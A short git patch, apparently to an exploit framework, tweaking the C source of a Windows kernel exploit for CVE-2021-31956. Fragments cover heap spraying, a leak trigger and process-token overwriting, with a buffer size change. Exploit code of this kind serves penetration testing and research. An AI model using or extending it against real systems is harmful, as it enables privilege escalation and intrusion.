From 3e6f3a15fa173d113da1139305eb5a034fb6c3a3 Mon Sep 17 00:00:00 2001
From: Tim W <timrlw@gmail.com>
Date: Fri, 21 Jan 2022 09:23:47 +0000
Subject: [PATCH] 0x10000 /shrug

---
 .../source/exploits/CVE-2021-31956/CVE-2021-31956/dllmain.c | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/external/source/exploits/CVE-2021-31956/CVE-2021-31956/dllmain.c b/external/source/exploits/CVE-2021-31956/CVE-2021-31956/dllmain.c
index a399a8c7c930..cbe6cfd348c4 100644
--- a/external/source/exploits/CVE-2021-31956/CVE-2021-31956/dllmain.c
+++ b/external/source/exploits/CVE-2021-31956/CVE-2021-31956/dllmain.c
@@ -402,6 +402,7 @@ int tiggerLeak()
 	/*dprintf("got temp filename %s", lpTempFileName);*/
 
 	hFile = CreateFileA("C:\\Users\\User\\AppData\\Local\\Temp\\payload",
+	/*hFile = CreateFileA("payload",*/
 		GENERIC_READ | GENERIC_WRITE,
 		FILE_SHARE_READ | FILE_SHARE_WRITE,
 		NULL,
@@ -538,7 +539,6 @@ int HeapSpray()
 		
 	}  
 
-
 	for (int i = 1; i < SPRAY_COUNT; i+=2)
 	{
 
@@ -757,8 +757,8 @@ NTSTATUS EnumProcessEprocess(PWNF_STATE_NAME StateName, PUCHAR Buff)
 		UINT64 token =  GetProcessToken(*(PULONGLONG)&(NameIns->StateName));
 
 
-		UCHAR tokenBuff[0x6000] = { 0 };
-		ULONG tokenBufferSize = 0x6000;
+		UCHAR tokenBuff[0x10000] = { 0 };
+		ULONG tokenBufferSize = 0x10000;
 
 		NameIns->StateData = (struct _WNF_STATE_DATA*)(eProcess + TOKEN_OFFSET);
 		state = OverStateData(StateName, Buff);